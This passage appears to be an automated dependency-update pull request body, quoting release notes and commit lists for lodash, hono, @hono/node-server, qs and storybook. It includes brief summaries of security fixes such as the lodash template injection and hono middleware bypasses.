properties from built-in prototypes. Now \u003ccode\u003econstructor\u003c/code\u003e and \u003ccode\u003eprototype\u003c/code\u003e are blocked unconditionally as non-terminal path keys, matching \u003ccode\u003ebaseSet\u003c/code\u003e. Calls that previously returned \u003ccode\u003etrue\u003c/code\u003e and deleted the property now return \u003ccode\u003efalse\u003c/code\u003e and leave the target untouched.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ccode\u003e_.template\u003c/code\u003e\u003c/strong\u003e: Fixed code injection via \u003ccode\u003eimports\u003c/code\u003e keys (\u003ca href=\"https://github.com/lodash/lodash/security/advisories/GHSA-r5fr-rjxr-66jc\"\u003eGHSA-r5fr-rjxr-66jc\u003c/a\u003e, CVE-2026-4800, \u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e879aaa9\u003c/a\u003e). Fixes an incomplete patch for CVE-2021-23337. The \u003ccode\u003evariable\u003c/code\u003e option was validated against \u003ccode\u003ereForbiddenIdentifierChars\u003c/code\u003e but \u003ccode\u003eimportsKeys\u003c/code\u003e was left unguarded, allowing code injection via the same \u003ccode\u003eFunction()\u003c/code\u003e constructor sink. \u003ccode\u003eimports\u003c/code\u003e keys containing forbidden identifier characters now throw \u003ccode\u003e\u0026quot;Invalid imports option passed into _.template\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003ch3\u003eDocs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd security notice for \u003ccode\u003e_.template\u003c/code\u003e in threat model and API docs (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6099\"\u003e#6099\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDocument \u003ccode\u003elower \u0026gt; upper\u003c/code\u003e behavior in \u003ccode\u003e_.random\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6115\"\u003e#6115\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix quotes in \u003ccode\u003e_.compact\u003c/code\u003e jsdoc (\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6090\"\u003e#6090\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ccode\u003elodash.*\u003c/code\u003e modular packages\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lodash/lodash/pull/6157\"\u003eDiff\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe have also regenerated and published a select number of the \u003ccode\u003elodash.*\u003c/code\u003e modular packages.\u003c/p\u003e\n\u003cp\u003eThese modular packages had fallen out of sync significantly from the minor/patch updates to lodash. Specifically, we have brought the following packages up to parity w/ the latest lodash release because they have had CVEs on them in the past:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.orderby\"\u003elodash.orderby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.tonumber\"\u003elodash.tonumber\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trim\"\u003elodash.trim\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.trimend\"\u003elodash.trimend\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.sortedindexby\"\u003elodash.sortedindexby\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.zipobjectdeep\"\u003elodash.zipobjectdeep\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.unset\"\u003elodash.unset\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.omit\"\u003elodash.omit\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://www.npmjs.com/package/lodash.template\"\u003elodash.template\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/cb0b9b9212521c08e3eafe7c8cb0af1b42b6649e\"\u003e\u003ccode\u003ecb0b9b9\u003c/code\u003e\u003c/a\u003e release(patch): bump main to 4.18.1 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6177\"\u003e#6177\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/75535f57883b7225adb96de1cfc1cd4169cfcb51\"\u003e\u003ccode\u003e75535f5\u003c/code\u003e\u003c/a\u003e chore: prune stale advisory refs (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6170\"\u003e#6170\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/62e91bc6a39c98d85b9ada8c44d40593deaf82a4\"\u003e\u003ccode\u003e62e91bc\u003c/code\u003e\u003c/a\u003e docs: remove n_ Node.js \u0026lt; 6 REPL note from README (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6165\"\u003e#6165\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/59be2de61f8aa9461c7856533b51d31b7d8babc4\"\u003e\u003ccode\u003e59be2de\u003c/code\u003e\u003c/a\u003e release(minor): bump to 4.18.0 (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6161\"\u003e#6161\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/af634573030f979194871da7c68f79420992f53d\"\u003e\u003ccode\u003eaf63457\u003c/code\u003e\u003c/a\u003e fix: broken tests for _.template 879aaa9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/1073a7693e1727e0cf3641e5f71f75ddcf8de7c0\"\u003e\u003ccode\u003e1073a76\u003c/code\u003e\u003c/a\u003e fix: linting issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/879aaa93132d78c2f8d20c60279da9f8b21576d6\"\u003e\u003ccode\u003e879aaa9\u003c/code\u003e\u003c/a\u003e fix: validate imports keys in _.template\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/fe8d32eda854377349a4f922ab7655c8e5df9a0b\"\u003e\u003ccode\u003efe8d32e\u003c/code\u003e\u003c/a\u003e fix: block prototype pollution in baseUnset via constructor/prototype traversal\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/18ba0a32f42fd02117f096b032f89c984173462d\"\u003e\u003ccode\u003e18ba0a3\u003c/code\u003e\u003c/a\u003e refactor(fromPairs): use baseAssignValue for consistent assignment (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6153\"\u003e#6153\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lodash/lodash/commit/b8190803d48d60b8c80ad45d39125f32fa618cb2\"\u003e\u003ccode\u003eb819080\u003c/code\u003e\u003c/a\u003e ci: add dist sync validation workflow (\u003ca href=\"https://redirect.github.com/lodash/lodash/issues/6137\"\u003e#6137\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/lodash/lodash/compare/4.17.23...4.18.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@hono/node-server` from 1.19.11 to 1.19.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/honojs/node-server/releases\"\u003e@​hono/node-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.19.13\u003c/h2\u003e\n\u003ch2\u003eSecurity Fix\u003c/h2\u003e\n\u003cp\u003eFixed an issue in Serve Static Middleware where inconsistent handling of repeated slashes (\u003ccode\u003e//\u003c/code\u003e) between the router and static file resolution could allow middleware to be bypassed. Users of Serve Static Middleware are encouraged to upgrade to this version.\u003c/p\u003e\n\u003cp\u003eSee GHSA-92pp-h63x-v22m for details.\u003c/p\u003e\n\u003ch2\u003ev1.19.12\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: ignore claude setting by \u003ca href=\"https://github.com/yusukebe\"\u003e\u003ccode\u003e@​yusukebe\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/node-server/pull/314\"\u003ehonojs/node-server#314\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: request draining for early 413 responses by \u003ca href=\"https://github.com/usualoma\"\u003e\u003ccode\u003e@​usualoma\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/node-server/pull/329\"\u003ehonojs/node-server#329\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/honojs/node-server/compare/v1.19.11...v1.19.12\"\u003ehttps://github.com/honojs/node-server/compare/v1.19.11...v1.19.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/fd64e659a34ec661fd9ccda00d1b9dff88dfaf90\"\u003e\u003ccode\u003efd64e65\u003c/code\u003e\u003c/a\u003e 1.19.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/025c30f55d589ddbe6048b151d77e904f67a8cc2\"\u003e\u003ccode\u003e025c30f\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/6cdb5a724952f3df5748e435637792068ebea6d9\"\u003e\u003ccode\u003e6cdb5a7\u003c/code\u003e\u003c/a\u003e 1.19.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/70250f780ec99d2ddc0dd8275a42f8e091e06e94\"\u003e\u003ccode\u003e70250f7\u003c/code\u003e\u003c/a\u003e fix: request draining for early 413 responses (\u003ca href=\"https://redirect.github.com/honojs/node-server/issues/329\"\u003e#329\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/node-server/commit/cfc08b330a1f2e0a2d8cc7797cde389465b5f4fb\"\u003e\u003ccode\u003ecfc08b3\u003c/code\u003e\u003c/a\u003e chore: ignore claude setting (\u003ca href=\"https://redirect.github.com/honojs/node-server/issues/314\"\u003e#314\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/honojs/node-server/compare/v1.19.11...v1.19.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `hono` from 4.12.8 to 4.12.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/honojs/hono/releases\"\u003ehono's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.12.18\u003c/h2\u003e\n\u003ch2\u003eSecurity fixes\u003c/h2\u003e\n\u003cp\u003eThis release includes fixes for the following security issues:\u003c/p\u003e\n\u003ch3\u003eCache Middleware ignores Vary: Authorization / Vary: Cookie leading to cross-user cache leakage\u003c/h3\u003e\n\u003cp\u003eAffects: Cache Middleware. Fixes missing cache-skip handling for \u003ccode\u003eVary: Authorization\u003c/code\u003e and \u003ccode\u003eVary: Cookie\u003c/code\u003e, where a response cached for one authenticated user could be served to other users. GHSA-p77w-8qqv-26rm\u003c/p\u003e\n\u003ch3\u003eCSS Declaration Injection via Style Object Values in JSX SSR\u003c/h3\u003e\n\u003cp\u003eAffects: hono/jsx. Fixes a missing CSS-context escape for \u003ccode\u003estyle\u003c/code\u003e object values and property names, where untrusted input could inject additional CSS declarations. The impact is limited to CSS and does not allow JavaScript execution. GHSA-qp7p-654g-cw7p\u003c/p\u003e\n\u003ch3\u003eImproper validation of NumericDate claims (exp, nbf, iat) in JWT verify()\u003c/h3\u003e\n\u003cp\u003eAffects: \u003ccode\u003ehono/utils/jwt\u003c/code\u003e. Fixes improper validation of \u003ccode\u003eexp\u003c/code\u003e, \u003ccode\u003enbf\u003c/code\u003e, and \u003ccode\u003eiat\u003c/code\u003e claims, where falsy, non-finite, or non-numeric values could silently bypass time-based checks instead of being rejected per RFC 7519. GHSA-hm8q-7f3q-5f36\u003c/p\u003e\n\u003chr /\u003e\n\u003cp\u003eUsers who use the JWT helper, hono/jsx, or the Cache middleware are strongly encouraged to upgrade to this version.\u003c/p\u003e\n\u003ch2\u003ev4.12.17\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(jsx): normalize SVG attributes on the \u003c!-- raw HTML omitted --\u003e root element by \u003ca href=\"https://github.com/kfly8\"\u003e\u003ccode\u003e@​kfly8\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4893\"\u003ehonojs/hono#4893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(ssg): add \u003ccode\u003eatom+xml\u003c/code\u003e and \u003ccode\u003erss+xml\u003c/code\u003e to \u003ccode\u003edefaultExtensionMap\u003c/code\u003e by \u003ca href=\"https://github.com/yuintei\"\u003e\u003ccode\u003e@​yuintei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4899\"\u003ehonojs/hono#4899\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(cors): make origin optional in CORSOptions by \u003ca href=\"https://github.com/truffle-dev\"\u003e\u003ccode\u003e@​truffle-dev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4905\"\u003ehonojs/hono#4905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(types): propagate middleware response types to app.on overloads by \u003ca href=\"https://github.com/T4ko0522\"\u003e\u003ccode\u003e@​T4ko0522\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4906\"\u003ehonojs/hono#4906\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kfly8\"\u003e\u003ccode\u003e@​kfly8\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4893\"\u003ehonojs/hono#4893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/truffle-dev\"\u003e\u003ccode\u003e@​truffle-dev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4905\"\u003ehonojs/hono#4905\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/honojs/hono/compare/v4.12.16...v4.12.17\"\u003ehttps://github.com/honojs/hono/compare/v4.12.16...v4.12.17\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev4.12.16\u003c/h2\u003e\n\u003ch2\u003eSecurity fixes\u003c/h2\u003e\n\u003cp\u003eThis release includes fixes for the following security issues:\u003c/p\u003e\n\u003ch3\u003eUnvalidated JSX Tag Names in hono/jsx May Allow HTML Injection\u003c/h3\u003e\n\u003cp\u003eAffects: hono/jsx. Fixes missing validation of JSX tag names when using \u003ccode\u003ejsx()\u003c/code\u003e or \u003ccode\u003ecreateElement()\u003c/code\u003e, which could allow HTML injection if untrusted input is used as the tag name. GHSA-69xw-7hcm-h432\u003c/p\u003e\n\u003ch3\u003ebodyLimit() can be bypassed for chunked / unknown-length requests\u003c/h3\u003e\n\u003cp\u003eAffects: Body Limit Middleware. Fixes late enforcement for request bodies without a reliable Content-Length (e.g. chunked requests), where oversized requests could reach handlers and return successful responses before being rejected. GHSA-9vqf-7f2p-gf9v\u003c/p\u003e\n\u003ch2\u003ev4.12.15\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(jwt): support single-line PEM keys by \u003ca href=\"https://github.com/hiendv\"\u003e\u003ccode\u003e@​hiendv\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/honojs/hono/pull/4889\"\u003ehonojs/hono#4889\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/f10dee89ced5956b73c1cdc416d6bc0fd54d63b7\"\u003e\u003ccode\u003ef10dee8\u003c/code\u003e\u003c/a\u003e 4.12.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/a5bd9ebead279ed9d0239ecbd854f629edfc0e57\"\u003e\u003ccode\u003ea5bd9eb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/58d3d3ad5656e007ed99da1b73865975952de5e9\"\u003e\u003ccode\u003e58d3d3a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/568c2ecc1dd556894fad4dfa4a7ba499db6dba9c\"\u003e\u003ccode\u003e568c2ec\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/ff2b3d31df1be35f7d597a95dd3369402b6e87f2\"\u003e\u003ccode\u003eff2b3d3\u003c/code\u003e\u003c/a\u003e 4.12.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/52aaaf9714b06303ce5caa655b1d80675be687e9\"\u003e\u003ccode\u003e52aaaf9\u003c/code\u003e\u003c/a\u003e fix(types): propagate middleware response types to app.on overloads (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4906\"\u003e#4906\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/76d5589e9b0569f4e74ec37e8dd6979455f70dfa\"\u003e\u003ccode\u003e76d5589\u003c/code\u003e\u003c/a\u003e fix(cors): make origin optional in CORSOptions (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4905\"\u003e#4905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/8f027e5574e91e3c7f263a728656e3888559e51a\"\u003e\u003ccode\u003e8f027e5\u003c/code\u003e\u003c/a\u003e fix(ssg): add \u003ccode\u003eatom+xml\u003c/code\u003e and \u003ccode\u003erss+xml\u003c/code\u003e to \u003ccode\u003edefaultExtensionMap\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4899\"\u003e#4899\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/bfba97ca7ea3d4541a3419f1749e5a1a3e8f1727\"\u003e\u003ccode\u003ebfba97c\u003c/code\u003e\u003c/a\u003e fix(jsx): normalize SVG attributes on the \u0026lt;svg\u0026gt; root element (\u003ca href=\"https://redirect.github.com/honojs/hono/issues/4893\"\u003e#4893\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/honojs/hono/commit/90d4182aabd328e2ec6af3f25ec62ddc574ad8cb\"\u003e\u003ccode\u003e90d4182\u003c/code\u003e\u003c/a\u003e 4.12.16\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/honojs/hono/compare/v4.12.8...v4.12.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `storybook` from 8.5.2 to 8.6.17\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/storybookjs/storybook/releases\"\u003estorybook's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev8.6.17\u003c/h2\u003e\n\u003ch2\u003e8.6.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHarden websocket connection\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev8.6.16\u003c/h2\u003e\n\u003ch2\u003e8.6.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNo-op release. No changes.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/storybookjs/storybook/blob/v8.6.17/CHANGELOG.md\"\u003estorybook's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.6.17\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eHarden websocket connection\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.6.16\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eNo-op release. No 